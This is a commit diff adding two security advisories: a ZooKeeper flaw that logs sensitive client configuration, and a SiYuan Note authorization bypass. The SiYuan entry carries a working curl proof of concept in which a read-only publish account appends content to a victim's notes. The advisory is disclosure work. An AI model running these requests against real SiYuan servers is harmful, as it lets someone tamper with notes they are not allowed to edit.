Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 97dafe303f8f · 2026-03-09T18:20:29.000Z
GHSA-crhr-qqj8-rpxc GHSA-f9cq-v43p-v523 GHSA-crhr-qqj8-rpxc
diff --git a/advisories/github-reviewed/2026/03/GHSA-crhr-qqj8-rpxc/GHSA-crhr-qqj8-rpxc.json b/advisories/github-reviewed/2026/03/GHSA-crhr-qqj8-rpxc/GHSA-crhr-qqj8-rpxc.json
@@ -0,0 +1,92 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-crhr-qqj8-rpxc",
+  "modified": "2026-03-09T18:19:16Z",
+  "published": "2026-03-07T09:30:15Z",
+  "aliases": [
+    "CVE-2026-24308"
+  ],
+  "summary": "Apache ZooKeeper has improper handling of configuration values",
+  "details": "Improper handling of configuration values in ZKConfig in Apache ZooKeeper 3.8.5 and 3.9.4 on all platforms allows an attacker to expose sensitive information stored in client configuration in the client's logfile. Configuration values are exposed at INFO level logging rendering potential production systems affected by the issue. Users are recommended to upgrade to version 3.8.6 or 3.9.5 which fixes this issue.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "org.apache.zookeeper:zookeeper"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "3.9.0"
+            },
+            {
+              "fixed": "3.9.5"
+            }
+          ]
+        }
+      ]
+    },
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "org.apache.zookeeper:zookeeper"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "3.8.0"
+            },
+            {
+              "fixed": "3.8.6"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24308"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/apache/zookeeper"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/apache/zookeeper/releases/tag/release-3.8.6"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/apache/zookeeper/releases/tag/release-3.9.5"
+    },
+    {
+      "type": "WEB",
+      "url": "https://lists.apache.org/thread/qng3rtzv2pqkmko4rhv85jfplkyrgqdr"
+    },
+    {
+      "type": "WEB",
+      "url": "http://www.openwall.com/lists/oss-security/2026/03/07/5"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-532"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-09T18:19:16Z",
+    "nvd_published_at": "2026-03-07T09:16:07Z"
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-f9cq-v43p-v523/GHSA-f9cq-v43p-v523.json b/advisories/github-reviewed/2026/03/GHSA-f9cq-v43p-v523/GHSA-f9cq-v43p-v523.json
@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-f9cq-v43p-v523",
+  "modified": "2026-03-09T18:18:39Z",
+  "published": "2026-03-09T18:18:39Z",
+  "aliases": [
+    "CVE-2026-30926"
+  ],
+  "summary": "SiYuan: Authorization Bypass Allows Low-Privilege Publish User to Modify Notebook Content via /api/block/appendHeadingChildren",
+  "details": "### Summary\nA privilege escalation vulnerability exists in the publish service of SiYuan Note that allows a low-privilege publish account (RoleReader) to modify notebook content via the `/api/block/appendHeadingChildren` API endpoint.\n\nThe endpoint only requires `model.CheckAuth`, which accepts `RoleReader` sessions. Because the endpoint performs a persistent document mutation and does not enforce `CheckAdminRole` or `CheckReadonly`, a publish user with read-only privileges can append new blocks to existing documents.\n\nThis allows remote authenticated publish users to modify notebook content and compromise the integrity of stored notes.\n\n### Details\n\nFile: router.go, block.go, block.go, session.go\nLines: router.go:245, api/block.go:193-205, model/block.go:688-714, model/session.go:201-209\nVulnerable Code:\n```\n- router.go: ginServer.Handle(\"POST\", \"/api/block/appendHeadingChildren\", model.CheckAuth, appendHeadingChildren)\n- api/block.go: model.AppendHeadingChildren(id, childrenDOM)\n- model/block.go: indexWriteTreeUpsertQueue(tree) (persists document mutation)\n- session.go: CheckAuth accepts RoleReader as authenticated\n```\nWhy Vulnerable:\nA low-privilege publish account (RoleReader, read-only) passes CheckAuth, but this write endpoint lacks CheckAdminRole and CheckReadonly. The handler performs persistent document writes.\n\n\n\n### PoC\n\n1. Enable publish service and create low-privilege account\n```\ncurl -u workspace:<ACCESS_AUTH_CODE> \\\n-H \"Content-Type: application/json\" \\\n-d '{\n  \"enable\": true,\n  \"port\": 6808,\n  \"auth\": {\n    \"enable\": true,\n    \"accounts\": [\n      {\n        \"username\": \"viewer\",\n        \"password\": \"viewerpass\"\n      }\n    ]\n  }\n}' \\\nhttp://127.0.0.1:6806/api/setting/setPublish\n```\n2. Create a test notebook and document (admin)\n```\ncurl -u workspace:<ACCESS_AUTH_CODE> \\\n-H \"Content-Type: application/json\" \\\n-d '{\"name\":\"AuditPOC\"}' \\\nhttp://127.0.0.1:6806/api/notebook/createNotebook\n```\nCreate a document containing a heading:\n```\ncurl -u workspace:<ACCESS_AUTH_CODE> \\\n-H \"Content-Type: application/json\" \\\n-d '{\n  \"notebook\":\"<NOTEBOOK_ID>\",\n  \"path\":\"/Victim\",\n  \"markdown\":\"# VictimHeading\\n\\nOriginal paragraph\"\n}' \\\nhttp://127.0.0.1:6806/api/filetree/createDocWithMd\n```\n3. Retrieve heading block ID (low-priv publish account)\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d '{\"stmt\":\"SELECT id,root_id FROM blocks WHERE content='\\''VictimHeading'\\'' LIMIT 1\"}' \\\nhttp://127.0.0.1:6808/api/query/sql\n```\nExample response:\n```\n{\n \"id\":\"20260307093334-05sj7bz\",\n \"root_id\":\"20260307093334-vsa6ft0\"\n}\n```\n4. Generate block DOM\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d '{\"dom\":\"<p>InjectedByReader</p>\"}' \\\nhttp://127.0.0.1:6808/api/lute/html2BlockDOM\n```\n\n5. Append block using the vulnerable endpoint\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d '{\n\"id\":\"20260307093334-05sj7bz\",\n\"childrenDOM\":\"<div ...>InjectedByReader</div>\"\n}' \\\nhttp://127.0.0.1:6808/api/block/appendHeadingChildren\n```\nServer response:\n```\n{\"code\":0}\n```\n\n6. Verify unauthorized modification\n```\ncurl -u viewer:viewerpass \\\n-H \"Content-Type: application/json\" \\\n-d '{\"stmt\":\"SELECT content FROM blocks WHERE root_id='\\''20260307093334-vsa6ft0'\\'' ORDER BY sort\"}' \\\nhttp://127.0.0.1:6808/api/query/sql\n```\nResult includes attacker-controlled content:\n```\nInjectedByReader\n```\nThis confirms that the low-privilege publish user successfully modified the document.\n\n### Impact\nThis vulnerability allows any authenticated publish user with read-only privileges (RoleReader) to modify notebook content.\n\nPotential impacts include:\n\n• Unauthorized modification of private notes\n• Content tampering in published notebooks\n• Loss of data integrity\n• Possible chaining with other API endpoints to escalate further privileges\n\nThe issue occurs because write operations are protected only by CheckAuth rather than enforcing role-based authorization checks.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/siyuan-note/siyuan/kernel"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "0.0.0-20260304035530-d03ebdec8279"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/siyuan-note/siyuan"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-284",
+      "CWE-862"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-09T18:18:39Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/unreviewed/2026/03/GHSA-crhr-qqj8-rpxc/GHSA-crhr-qqj8-rpxc.json b/advisories/unreviewed/2026/03/GHSA-crhr-qqj8-rpxc/GHSA-crhr-qqj8-rpxc.json
